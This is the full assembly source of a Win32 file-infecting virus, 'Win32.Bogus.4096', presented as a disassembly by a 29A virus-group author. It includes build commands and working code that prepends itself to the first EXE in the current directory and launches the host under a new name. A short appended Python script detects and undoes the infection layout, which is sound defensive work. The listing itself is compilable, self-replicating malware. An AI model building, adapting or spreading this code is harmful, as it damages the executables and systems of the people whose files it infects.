comment *

        Win32.Bogus.4096 - Disassembly by Darkman/29A

        Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
        first file in current directory, when executed, by prepending the virus to
        the original EXE file.

        Compile Win32.Bogus.4096 with Turbo Assembler v5.0 by typing:

        tasm32 /m /ml /q bogus.asm
        tlink32 -Tpe -c -x -aa -r bogus.obj ,, import32
*
.386
.model flat

; KERNEL32.dll
extrn   ExitProcess:proc
extrn   FindFirstFileA:proc
extrn   WinExec:proc
extrn   _lclose:proc
extrn   _llseek:proc
extrn   _lopen:proc
extrn   _lread:proc
extrn   _lwrite:proc
extrn   CopyFileA:proc

.data

max_path        equ     0ffh
false           equ     00h
of_readwrite    equ     02h             ; Opens the file for reading and
                                        ; writing
sw_show         equ     05h             ; Activates the window and displays it
                                        ; in its current size and position

filetime        struct
dwLowDateTime   dword   ?               ; Specifies the low-order 32 bits of
                                        ; the file time
dwHighDateTime  dword   ?               ; Specifies the high-order 32 bits of
                                        ; the file time
filetime        ends

win32_find_data struct
dwFileAttributes dword  ?               ; Specifies the file attributes of the
                                        ; file found
ftCreationTime  filetime <>             ; Specifies the time the file was
                                        ; created
ftLastAccessTime filetime <>            ; Specifies the time that the file was
                                        ; last accessed
ftLastWriteTime filetime <>             ; Specifies the time that the file was
                                        ; last written to
nFileSizeHigh   dword   ?               ; Specifies the high-order DWORD value
                                        ; of the file size, in bytes
nFileSizeLow    dword   ?               ; Specifies the low-order DWORD value
                                        ; of the file size, in bytes
dwReserved0     dword   ?               ; Reserved for future use
dwReserved1     dword   ?               ; Reserved for future use
cFileName       byte    max_path dup(?) ; A null-terminated string that is the
                                        ; name of the file
cAlternateFileName byte 0eh dup(?)      ; A null-terminated string that is an
                                        ; alternative name for the file
win32_find_data ends

findfiledata    win32_find_data <>
szfilename      db      '*.exe',00h     ; Name of file to search for
sznewfilename   db      'Zernebogus.exe',00h ; Null-terminated string that
                                        ; specifies the name of the new file
cbuffer         db      ?               ; Buffer for read data, data to be
                                        ; written
cbuffer_        db      ?               ; Buffer for read data, data to be
                                        ; written

.code
code_begin:
                lea     edi,[esp+10h]   ; EDI = pointer to buffer for module
                                        ; path
                push    edi             ; Save pointer to buffer for module
                                        ; path
                repne   scasb           ; Find end of filename
                mov     byte ptr [edi-01h],'.' ; Store dot
                pop     edi             ; EDI = pointer to buffer for module
                                        ; path
                push    offset findfiledata ; Address of returned information
                push    offset szfilename ; Address of name of file to search
                                        ; for
                call    FindFirstFileA
                push    false           ; If file already exists, overwrite it
                push    offset sznewfilename ; Address of filename to copy to
                push    edi             ; Address of name of an existing file
                call    CopyFileA
                push    of_readwrite    ; Opens the file for reading and
                                        ; writing
                push    offset findfiledata.cFileName ; Address of name of file
                                        ; to open
                call    _lopen
                mov     esi,eax         ; ESI = file handle (destination file)
                push    of_readwrite    ; Opens the file for reading and
                                        ; writing
                push    offset sznewfilename ; Address of filename to copy to
                call    _lopen
                mov     edi,eax         ; EDI = file handle (source file)
                xor     ebx,ebx         ; Number of bytes read and written
                mov     ebp,0fffff000h  ; Number of bytes to move through
                                        ; source file
read_write_loop:
                push    00h             ; Position to move from
                push    ebx             ; Number of bytes to move
                push    esi             ; Destination file handle
                call    _llseek
                push    01h             ; Length, in bytes, of data buffer
                push    offset cbuffer  ; Address of buffer for read data
                push    esi             ; Destination file handle
                call    _lread
                push    00h             ; Position to move from
                push    ebx             ; Number of bytes to move
                push    edi             ; Source file handle
                call    _llseek
                push    01h             ; Length, in bytes, of data buffer
                push    offset cbuffer_ ; Address of buffer for read data
                push    edi             ; Source file handle
                call    _lread
                push    00h             ; Position to move from
                push    ebx             ; Number of bytes to move
                push    esi             ; Destination file handle
                call    _llseek
                push    01h             ; Number of bytes to write
                push    offset cbuffer_ ; Address of buffer for data to be
                                        ; written
                push    esi             ; Destination file handle
                call    _lwrite
                push    02h             ; Position to move from
                push    00h             ; Number of bytes to move
                push    esi             ; Destination file handle
                call    _llseek
                push    01h             ; Number of bytes to write
                push    offset cbuffer  ; Address of buffer for data to be
                                        ; written
                push    esi             ; Destination file handle
                call    _lwrite
                push    02h             ; Position to move from
                push    ebp             ; Number of bytes to move
                push    edi             ; Source file handle
                call    _llseek
                push    01h             ; Length, in bytes, of data buffer
                push    offset cbuffer  ; Address of buffer for read data
                push    edi             ; Source file handle
                call    _lread
                push    00h             ; Position to move from
                push    ebx             ; Number of bytes to move
                push    edi             ; Source file handle
                call    _llseek
                push    01h             ; Number of bytes to write
                push    offset cbuffer  ; Address of buffer for data to be
                                        ; written
                push    edi             ; Source file handle
                call    _lwrite
                inc     ebx             ; Increase number of bytes read and
                                        ; written
                inc     ebp             ; Increase number of bytes to move
                                        ; through source file
                cmp     bx,1000h        ; Read and written all of the virus?
                jne     read_write_loop ; Not equal? Jump to read_write_loop
                push    edi             ; Handle to close
                call    _lclose
                push    sw_show         ; Activates the window and displays it
                                        ; in its current size and position
                push    offset sznewfilename ; Address of filename to copy to
                call    WinExec
code_end:
end             code_begin
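As an added recovery example (not part of the listing above or of any 29A code): the read/write loop leaves an infected file laid out as the 4096-byte virus, then the host from offset 4096 onward, then the host's displaced first 4096 bytes, so a disinfector only has to move the trailing block back to the front. The marker string and the 4096-byte size come from the listing; the sample prefix and host bytes are constructed, and the MZ-plus-marker check is an assumed heuristic, not a published signature.

```python
# Added example (not part of the 29A listing): recognise and undo the file
# layout that Win32.Bogus.4096's read/write loop leaves behind.
#
# The loop writes the 4096-byte virus prefix over the host's first 4096
# bytes and appends those displaced host bytes at the end, so an infected
# file is laid out as:
#     virus[:4096] + host[4096:] + host[:4096]
# and the original host is infected[-4096:] + infected[4096:-4096].
# Hosts shorter than 4096 bytes are not modelled here.
VIRUS_SIZE = 0x1000                    # 1000h loop iterations in the listing
MARKER = b"Zernebogus.exe\x00"         # sznewfilename string from the listing


def is_bogus_infected(data: bytes) -> bool:
    """Assumed heuristic: MZ header plus the virus's file-name string in the prefix."""
    if len(data) < 2 * VIRUS_SIZE or data[:2] != b"MZ":
        return False
    return MARKER in data[:VIRUS_SIZE]


def disinfect(data: bytes) -> bytes:
    """Reassemble the host from the virus + host[4096:] + host[:4096] layout."""
    if not is_bogus_infected(data):
        raise ValueError("not recognised as Win32.Bogus.4096-infected")
    host = data[-VIRUS_SIZE:] + data[VIRUS_SIZE:-VIRUS_SIZE]
    if host[:2] != b"MZ":
        raise ValueError("recovered data does not start with an MZ header")
    return host


def bogus_layout(virus_prefix: bytes, host: bytes) -> bytes:
    """Byte-slice model of the swap the listing's loop performs.

    Used only to construct test input for the two functions above.
    """
    if len(virus_prefix) != VIRUS_SIZE or len(host) < VIRUS_SIZE:
        raise ValueError("prefix must be 4096 bytes and host at least as long")
    return virus_prefix + host[VIRUS_SIZE:] + host[:VIRUS_SIZE]


if __name__ == "__main__":
    # Constructed sample data: a fake 4096-byte prefix and a fake host.
    prefix = (b"MZ" + b"\x00" * 64 + MARKER).ljust(VIRUS_SIZE, b"\xcc")
    host = b"MZhost" + bytes(range(256)) * 20
    infected = bogus_layout(prefix, host)
    assert is_bogus_infected(infected) and not is_bogus_infected(host)
    print("recovered host matches original:", disinfect(infected) == host)
```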